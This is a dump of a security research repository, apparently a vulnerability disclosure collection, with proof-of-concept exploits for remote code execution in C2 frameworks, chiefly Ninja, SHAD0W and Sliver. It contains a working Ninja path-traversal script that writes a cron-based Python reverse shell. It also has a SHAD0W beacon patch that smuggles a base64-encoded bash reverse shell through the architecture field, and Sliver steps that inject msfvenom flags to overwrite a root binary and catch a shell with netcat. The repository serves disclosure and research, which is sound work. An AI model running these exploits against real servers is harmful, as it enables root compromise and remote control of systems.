Technique\": \"WaitForSingleObjectEx\",\n \"Stack Duplication\": false\n}\n", "Format": "Windows Service Exe", "Listener": "abc"}, "SubEvent": 2}, "Head": { 30 | "Event": 5, "OneTime": "true", "Time": "18:39:04", "User": USER}} 31 | ws.send(json.dumps(payload)) 32 | while True: 33 | bla = ws.recv() 34 | if b"compile output" in bla: 35 | bla2 = json.loads(bla) 36 | # print(bla2) 37 | out = bla2["Body"]["Info"]["Message"].split("\n") 38 | # print(out) 39 | 40 | for line in out[1:]: 41 | print(line) 42 | break 43 | 44 | ws.close() 45 | -------------------------------------------------------------------------------- /havoc_auth_rce/poc.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/IncludeSecurity/c2-vulnerabilities/a91bef7db34deea10ea959183bb786d3d060c556/havoc_auth_rce/poc.gif -------------------------------------------------------------------------------- /ninja_rce/README.md: -------------------------------------------------------------------------------- 1 | # Ninja Unauthenticated Arbitrary File Write RCE 2 | 3 | Ninja C2 is vulnerable to unauthenticated arbitrary file write. This can immediately be used to gain RCE against the Teamserver if running as root, if not RCE can be gained next time a C2 operator restarts the C2 server. 4 | 5 | The vulnerability is reminiscent of the [Skywalker](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/empire_skywalker.rb) vulnerability against Empire C2 from 2016. 6 | 7 | ![](poc.gif) 8 | 9 | 10 | ## Reproduction 11 | 12 | The vulnerability is in the [download route](https://github.com/ahmedkhlief/Ninja/blob/master/core/webserver.py#L321) of the public-facing C2 webserver, which does not check for filepath traversal from a `filename` provided by a connected C2 agent. 13 | 14 | First, a malicious agent needs to register with the C2 server at the [info route](https://github.com/ahmedkhlief/Ninja/blob/master/core/webserver.py#L179). The C2 webserver obfuscates itself by randomizing the URL paths of each endpoint from the following [list](https://github.com/ahmedkhlief/Ninja/blob/master/utils/links.txt), so we try each path until one returns an AES encryption key. 15 | 16 | Next we encrypt the target file, specify a path traversal sequence to overwrite an arbitrary filepath on the server, and try URL paths again until hitting the download endpoint. 17 | 18 | The `ninja_poc.py` script automates these steps. The example endpoint assumes the server is running as root and uses the same exploit as the Skywalker vulnerability which writes a Python reverse shell to `/etc/cron.d`. If not running as root, an alternative would be to overwrite a server source file and wait until the server is restarted. -------------------------------------------------------------------------------- /ninja_rce/ninja_poc.py: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import AES 2 | import requests 3 | import os 4 | import base64 5 | import random 6 | 7 | endpoints = ["ServiceDefinition", "admin", "atom", "axis", "context", "default", "disco", "extwsdl", "index", "inquire", "inquiryapi", "inspection", "interface", "interfaces", "jboss-net", "jbossws", "juddi", "manual", "methods", "name", "names", "operation", "operations", "oracle", "proxy", "publish", "publishing", "query", "rss", "service", "services", "svce", "uddi", "uddiexplorer", "uddigui", "uddilistener", "uddisoap", "webservice", "webserviceclient", "webserviceclient+ssl", "webservices", "ws", "ws4ee", "wsatom", "wsdl", "wsgw", "wsil", "xmethods"] 8 | 9 | URL = "http://192.168.167.131:4343" 10 | CALLBACK_IP = "192.168.167.1" 11 | CALLBACK_PORT = "8888" 12 | FILEPATH = "../../../../../../../../../../etc/cron.d/pwned" 13 | DATA = f"""* * * * * root python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{CALLBACK_IP}",{CALLBACK_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' 14 | """ 15 | 16 | agent_id = random.randint(1,99999999) 17 | register_payload = {'id':agent_id,'data':'${os}**${IP}**${arch}**${hostname}**${domain}**${whoami}**$pid&${random}=${agent}'} 18 | 19 | def encrypt(b64_key, data): 20 | bkey = base64.b64decode(b64_key) 21 | iv = os.urandom(16) 22 | aes = AES.new(bkey, AES.MODE_CBC, iv) 23 | 24 | mod = len(data) % 16 25 | if mod != 0: 26 | newlen = len(data) + (16 - mod) 27 | data = data.ljust(newlen, ' ') 28 | out = aes.IV + aes.encrypt(data.encode()) 29 | return base64.b64encode(out) 30 | 31 | for register_url in endpoints: 32 | res = requests.post(URL + "/" + register_url, data=register_payload) 33 | if res.status_code == 200 and len(res.text) == 44: 34 | print(f"Register endpoint found at /{register_url}") 35 | b64_key = res.text 36 | enc = encrypt(b64_key, DATA) 37 | 38 | for download_url in endpoints: 39 | download_payload = {'resource':agent_id,'d':enc, 'f': FILEPATH} 40 | res = requests.post(URL + "/" + download_url, data=download_payload) 41 | if res.status_code == 200 and res.text == "OK": 42 | print(f"Download endpoint found at /{download_url}") 43 | print(f"Filepath {FILEPATH} written") 44 | break 45 | break 46 | -------------------------------------------------------------------------------- /ninja_rce/poc.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/IncludeSecurity/c2-vulnerabilities/a91bef7db34deea10ea959183bb786d3d060c556/ninja_rce/poc.gif -------------------------------------------------------------------------------- /shad0w_rce/README.md: -------------------------------------------------------------------------------- 1 | # SHAD0W Unauthenticated RCE 2 | 3 | SHAD0W is vulnerable to an unauthenticated RCE against the C2 Teamserver. A malicious beacon can specify an arbitrary architecture value when registering with the Teamserver. When the C2 operator interacts with the beacon in certain ways, the architecture value is injected into a system compilation command. 4 | 5 | ![](poc.gif) 6 | 7 | ## Reproduction 8 | 9 | The `register_beacon()` function in [lib/path_handler.py](https://github.com/bats3c/shad0w/blob/master/lib/path_handler.py#L86) accepts URL-encoded parameters from beacons when they register with the C2 Teamserver. Unlike the `stage_beacon()` function, these parameters are not validated. Arbitrary architecture and operating system values can be provided by a malicious beacon. 10 | 11 | Several modules in SHAD0W also use the arbitrary beacon-provided values as parameters when compiling shellcode. For instance, the `migrate` module which implements process migration, [passes the architecture value](https://github.com/bats3c/shad0w/blob/d35b9dc74319800bbab1678aba69258532ec0200/lib/commands/migrate.py#L62) to `buildtools.make_in_clone()`. The value is [eventually interpolated](https://github.com/bats3c/shad0w/blob/master/lib/buildtools.py#L152) into an `os.system()` function call for the `make` command. 12 | 13 | The beacon-provided values are displayed to the C2 operator when the beacon first connects to the C2 server, so some level of obfuscation is required here to disguise the payload and spark the C2 operator's curiosity to interact with the beacon. 14 | 15 | The easiest way to demonstrate the exploit is with a patch to the in-built SHAD0W beacon. The payload below starts a bash reverse shell back to the targeted beacon server. In the animated POC above, some misleading strings have been added to disguise the injection. 16 | 17 | ``` 18 | 19 | diff --git a/beacon/injectable/beacon.c b/beacon/injectable/beacon.c 20 | index c7752c6..4e6051f 100644 21 | --- a/beacon/injectable/beacon.c 22 | +++ b/beacon/injectable/beacon.c 23 | @@ -47,14 +47,16 @@ void main() 24 | strcpy( CompInfo.OS, "NULL" ); 25 | } 26 | 27 | + char payload[] = ";echo YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjE2Ny4xMjgvODg4OCAwPiYxICYK|base64 -d|bash;"; 28 | + 29 | // format the data correctly so it can be used when we call back to the c2 30 | 31 | #if !defined(IMPERSONATE_SESSION) 32 | - sprintf(UriBuffer, "username=%s&domain=%s&machine=%s&arch=%s&os=%s&secure=%s", lpcUserName, lpcDomainName, lpcComputerName, CompInfo.Arch, CompInfo.OS, CompInfo.Secure); 33 | + sprintf(UriBuffer, "username=%s&domain=%s&machine=%s&arch=%s&os=%s&secure=%s", lpcUserName, lpcDomainName, lpcComputerName, payload, CompInfo.OS, CompInfo.Secure); 34 | #endif 35 | 36 | #if defined(IMPERSONATE_SESSION) 37 | - sprintf(UriBuffer, "username=%s&domain=%s&machine=%s&arch=%s&os=%s&secure=%s&impersonate=%s", lpcUserName, lpcDomainName, lpcComputerName, CompInfo.Arch, CompInfo.OS, CompInfo.Secure, IMPERSONATE_SESSION); 38 | + sprintf(UriBuffer, "username=%s&domain=%s&machine=%s&arch=%s&os=%s&secure=%s&impersonate=%s", lpcUserName, lpcDomainName, lpcComputerName, payload, CompInfo.OS, CompInfo.Secure, IMPERSONATE_SESSION); 39 | #endif 40 | 41 | // register back with the c2 42 | ``` 43 | 44 | Compile the beacon: 45 | 46 | `python3 shad0w.py beacon -p x64/windows/static -H 192.168.167.131 -f psh -o update.ps1` 47 | 48 | Run the beacon on a Windows host and setup the reverse shell. 49 | 50 | When the C2 operator runs a module such as `migrate` against the beacon, the command injection will trigger, "hacking back" the C2 framework. -------------------------------------------------------------------------------- /shad0w_rce/poc.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/IncludeSecurity/c2-vulnerabilities/a91bef7db34deea10ea959183bb786d3d060c556/shad0w_rce/poc.gif -------------------------------------------------------------------------------- /sliver_auth_rce/README.md: -------------------------------------------------------------------------------- 1 | # Sliver Auth RCE 2 | 3 | ## Description 4 | 5 | Sliver version 1.6.0 is vulnerable to RCE on the teamserver by a low-privileged "operator" user. The RCE is as the system root user since the Sliver server is installed as root. 6 | 7 | The exploit is pretty fun as we make the Sliver server pwn itself. 8 | 9 | ![](poc.gif) 10 | 11 | ## Impact 12 | As described in a [past issue](https://github.com/BishopFox/sliver/issues/65), "there is a clear security boundary between the operator and server, an operator should not inherently be able to run commands or code on the server." An operator who exploited this vulnerability would be able to view all console logs, kick all other operators, view and modify files stored on the server, and ultimately delete the server. 13 | 14 | ## Reproduction 15 | 16 | First configure the Sliver server [in multiplayer mode and add an operator profile](https://sliver.sh/docs?name=Multi-player+Mode). 17 | 18 | Next, compile a slightly older version of the Sliver client. The commit after 5016fb8d updates the Cobra command-line parsing library in the Sliver client to strictly validate command flags. 19 | 20 | ``` 21 | git checkout 5016fb8d 22 | VERSION=1.6.0 make client 23 | ``` 24 | 25 | The latest server version is targeted: 26 | 27 | ``` 28 | All hackers gain exalted 29 | [*] Server v1.6.0 - bdfd89167dd47aece2397c638d482f94f3f91cba 30 | [*] Client 1.6.0 - 5016fb8d7cdff38c79e22e8293e58300f8d3bd57 31 | [*] Welcome to the sliver shell, please type 'help' for options` 32 | ``` 33 | 34 | The exploit uses a command injection in the `generate msf-stager` to inject the `--out` flag to `msfvenom`. We overwrite Sliver's own go binary at `/root/.sliver/go/bin/go`: 35 | 36 | ``` 37 | sliver > generate msf-stager --lhost 192.168.0.128 --lport 8888 --advanced --platform=linux&--payload=linux/x64/shell_reverse_tcp&--format=elf&--out=/root/.sliver/go/bin/go 38 | 39 | [*] Sliver implant stager saved to: [...] 40 | ``` 41 | 42 | The other injected flags are to force a Linux payload, and not necessary if running the Sliver server on Windows. 43 | 44 | If you check the saved implant locally on the client, it's 0 bytes as the output got written to the file on the server instead. 45 | 46 | On the attacking machine, setup a netcat shell: 47 | 48 | ``` 49 | $ nc -lvp 8888 50 | Listening on 0.0.0.0 8888 51 | ``` 52 | 53 | Trigger the stager by running a command which executes `/root/.sliver/go/bin/go`: 54 | 55 | ``` 56 | sliver > generate beacon --mtls 1.2.3.4 57 | [*] Generating new windows/amd64 beacon implant binary (1m0s) 58 | [*] Symbol obfuscation is enabled 59 | ⠼ Compiling, please wait ... 60 | ``` 61 | 62 | A root shell will pop: 63 | 64 | ``` 65 | $ nc -lvp 8888 66 | Listening on 0.0.0.0 8888 67 | Connection received on 192.168.0.183 39238 68 | whoami 69 | root 70 | ``` 71 | 72 | The vulnerable code was introduced in https://github.com/BishopFox/sliver/pull/1281 73 | -------------------------------------------------------------------------------- /sliver_auth_rce/poc.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/IncludeSecurity/c2-vulnerabilities/a91bef7db34deea10ea959183bb786d3d060c556/sliver_auth_rce/poc.gif --------------------------------------------------------------------------------